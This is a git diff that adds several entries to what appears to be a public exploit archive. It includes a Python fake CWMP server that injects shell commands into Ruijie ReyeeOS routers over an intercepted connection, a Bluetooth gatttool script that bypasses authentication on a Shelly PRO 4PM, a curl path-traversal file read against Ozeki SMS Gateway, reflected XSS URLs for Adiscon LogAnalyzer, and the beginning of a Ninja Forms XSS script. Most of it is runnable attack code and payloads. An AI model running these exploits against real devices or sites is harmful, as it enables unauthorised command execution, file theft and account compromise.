diff --git a/exploits/hardware/remote/51642.py b/exploits/hardware/remote/51642.py new file mode 100755 index 000000000..0668cacb0 --- /dev/null +++ b/exploits/hardware/remote/51642.py @@ -0,0 +1,176 @@ +# Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE) +# Google Dork: None +# Date: July 31, 2023 +# Exploit Author: Riyan Firmansyah of Seclab +# Vendor Homepage: https://ruijienetworks.com +# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204 +# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400) +# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO +# CVE : None + +""" +Summary +======= +The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection. +In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request. +Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server. +Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system. +""" + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from html import escape, unescape +import http.server +import socketserver +import io +import time +import re +import argparse +import gzip + +# command payload +command = "uname -a" + +# change this to serve on a different port +PORT = 8080 + +def cwmp_inform(soap): + cwmp_id = re.search(r"(?:)(.*?)(?:<\/cwmp:ID>)", soap).group(1) + product_class = re.search(r"(?:)(.*?)(?:<\/ProductClass>)", soap).group(1) + serial_number = re.search(r"(?:)(.*?)(?:<\/SerialNumber>)", soap).group(1) + result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}} + parameters = re.findall(r"(?:

)(.*?)(?:<\/P>)", soap) + for parameter in parameters: + parameter_name = re.search(r"(?:)(.*?)(?:<\/N>)", parameter).group(1) + parameter_value = re.search(r"(?:)(.*?)(?:<\/V>)", parameter).group(1) + result['parameters'][parameter_name] = parameter_value + return result + +def cwmp_inform_response(): + return """ +1611""" + +def command_payload(command): + current_time = time.time() + result = """ +ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}1config{command}""".format(cur_time=current_time, command=command) + return result + +def command_response(soap): + cwmp_id = re.search(r"(?:)(.*?)(?:<\/cwmp:ID>)", soap).group(1) + command = re.search(r"(?:)(.*?)(?:<\/Command>)", soap).group(1) + response = re.search(r"(?:)((\n|.)*?)(?:<\/Response>)", soap).group(1) + result = {'cwmp_id': cwmp_id, 'command': command, 'response': response} + return result + +class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): + protocol_version = 'HTTP/1.1' + def do_GET(self): + self.send_response(204) + self.end_headers() + + def do_POST(self): + print("[*] Got hit by", self.client_address) + + f = io.BytesIO() + if 'service' in self.path: + stage, info = self.parse_stage() + if stage == "cwmp_inform": + self.send_response(200) + print("[!] Got Device information", self.client_address) + print("[*] Product Class:", info['product_class']) + print("[*] Serial Number:", info['serial_number']) + print("[*] MAC Address:", info['parameters']['mac']) + print("[*] STUN Client IP:", info['parameters']['stunclientip']) + payload = bytes(cwmp_inform_response(), 'utf-8') + f.write(payload) + self.send_header("Content-Length", str(f.tell())) + elif stage == "command_request": + self.send_response(200) + self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly") + print("[*] Device interacting", self.client_address) + print(info) + payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8') + f.write(payload) + self.send_header("Content-Length", str(f.tell())) + else: + print("[*] Command response", self.client_address) + print(unescape(info['response'])) + self.send_response(204) + f.write(b"") + else: + print("[x] Received invalid request", self.client_address) + self.send_response(204) + f.write(b"") + + f.seek(0) + self.send_header("Connection", "keep-alive") + self.send_header("Content-type", "text/xml;charset=utf-8") + self.end_headers() + if f: + self.copyfile(f, self.wfile) + f.close() + + def parse_stage(self): + content_length = int(self.headers['Content-Length']) + post_data = gzip.decompress(self.rfile.read(content_length)) + if "cwmp:Inform" in post_data.decode("utf-8"): + return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8"))) + elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"): + return ("command_response", command_response(post_data.decode("utf-8"))) + else: + return ("command_request", "Ping!") + + def log_message(self, format, *args): + return + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('--bind', '-b', default='', metavar='ADDRESS', + help='Specify alternate bind address ' + '[default: all interfaces]') + parser.add_argument('port', action='store', + default=PORT, type=int, + nargs='?', + help='Specify alternate port [default: {}]'.format(PORT)) + args = parser.parse_args() + + Handler = CustomHTTPRequestHandler + with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: + ip_addr = args.bind if args.bind != '' else '0.0.0.0' + print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) + try: + httpd.serve_forever() + except KeyboardInterrupt: + pass + httpd.server_close() + + +""" +Output +====== +ubuntu:~$ python3 exploit.py +[!] serving fake CWMP server at 0.0.0.0:8080 +[*] Got hit by ('[redacted]', [redacted]) +[!] Got Device information ('[redacted]', [redacted]) +[*] Product Class: EW1200G-PRO +[*] Serial Number: [redacted] +[*] MAC Address: [redacted] +[*] STUN Client IP: [redacted]:[redacted] +[*] Got hit by ('[redacted]', [redacted]) +[*] Device interacting ('[redacted]', [redacted]) +Ping! +[*] Got hit by ('[redacted]', [redacted]) +[*] Command response ('[redacted]', [redacted]) +PING 127.0.0.1 (127.0.0.1): 56 data bytes +64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms +64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms +64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms +64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms + +--- 127.0.0.1 ping statistics --- +4 packets transmitted, 4 packets received, 0% packet loss +round-trip min/avg/max = 0.300/0.335/0.400 ms +Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux + +""" \ No newline at end of file diff --git a/exploits/hardware/remote/51657.txt b/exploits/hardware/remote/51657.txt new file mode 100644 index 000000000..e5c64fa35 --- /dev/null +++ b/exploits/hardware/remote/51657.txt @@ -0,0 +1,68 @@ +#!/bin/bash + +# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass +# Google Dork: NA +# Date: 2nd August 2023 +# Exploit Author: The Security Team [exploitsecurity.io] +# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability +# Vendor Homepage: https://www.shelly.com/ +# Software Link: NA +# Version: Firmware v0.11.0 (REQUIRED) +# Tested on: MacOS/Linux +# CVE : CVE-2023-33383 + +IFS= +failed=$false +RED="\e[31m" +GREEN="\e[92m" +WHITE="\e[97m" +ENDCOLOR="\e[0m" +substring="Connection refused" + + +banner() + { + clear + echo -e "${GREEN}[+]*********************************************************[+]" + echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" + echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |" + echo -e "${GREEN}| CVE: CVE-2023-33383 |" + echo -e "${GREEN}[+]*********************************************************[+]" + echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}" + } + +banner +read -s -n 1 key +if [ "$key" = "x" ]; then + exit 0; +elif [ "$key" = "" ]; then + gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary) + if [ -z "$gattout" ]; then + echo -e "${RED}Connection timed out${ENDCOLOR}" + exit 0; + else + sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1 + echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}" + sleep 1 + if [ $? -eq 1 ]; then + $failed=$true + exit 0; + fi + sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1 + sleep 1 + if [ $? -eq 1 ]; then + $failed=$true + echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}" + exit 0; + else + sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1 + sleep 1 + for i in {1..5} + do + echo -ne "${GREEN}." + sleep 1 + done + echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}" + fi +fi +fi \ No newline at end of file diff --git a/exploits/multiple/webapps/51646.txt b/exploits/multiple/webapps/51646.txt new file mode 100644 index 000000000..aeff179a5 --- /dev/null +++ b/exploits/multiple/webapps/51646.txt @@ -0,0 +1,19 @@ +# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated) +# Date: 01.08.2023 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://ozeki-sms-gateway.com +# Software Link: +https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip +# Version: 10.3.208 +# Tested on: Windows 10 + + + +##################################### Arbitrary File Read PoC +##################################### + +curl +https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini + +##################################### Arbitrary File Read PoC +##################################### \ No newline at end of file diff --git a/exploits/php/webapps/51643.txt b/exploits/php/webapps/51643.txt new file mode 100644 index 000000000..f509b8917 --- /dev/null +++ b/exploits/php/webapps/51643.txt @@ -0,0 +1,24 @@ +# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting +# Date: 2023.Aug.01 +# Exploit Author: Pedro (ISSDU TW) +# Vendor Homepage: https://loganalyzer.adiscon.com/ +# Software Link: https://loganalyzer.adiscon.com/download/ +# Version: v4.1.13 and before +# Tested on: Linux +# CVE : CVE-2023-36306 + +There are several installation method. +If you installed without database(File-Based),No need to login. +If you installed with database, You should login with Read Only User(at least) + +XSS Payloads are as below: + +XSS +http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E +http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123 +http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E +http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E +http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E +http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E +http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E +http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E \ No newline at end of file diff --git a/exploits/php/webapps/51644.py b/exploits/php/webapps/51644.py new file mode 100755 index 000000000..f4fdda487 --- /dev/null +++ b/exploits/php/webapps/51644.py @@ -0,0 +1,158 @@ +# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated) +# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt +# Date: 2023-07-27 +# Exploit Author: Mehran Seifalinia +# Vendor Homepage: https://ninjaforms.com/ +# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip +# Version: 3.6.25 +# Tested on: Windows 10 +# CVE: CVE-2023-37979 + +from requests import get +from sys import argv +from os import getcwd +import webbrowser +from time import sleep + + +# Values: +url = argv[-1] +if url[-1] == "/": + url = url.rstrip("/") + +# Constants +CVE_NAME = "CVE-2023-37979" +VULNERABLE_VERSION = "3.6.25" + + # HTML template +HTML_TEMPLATE = f""" + + + + {CVE_NAME} + + + +

+ Ninja-forms reflected XSS ({CVE_NAME})
+ Created by Mehran Seifalinia +
+
+
+ + + + + + " /> + +
+
+
After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.
+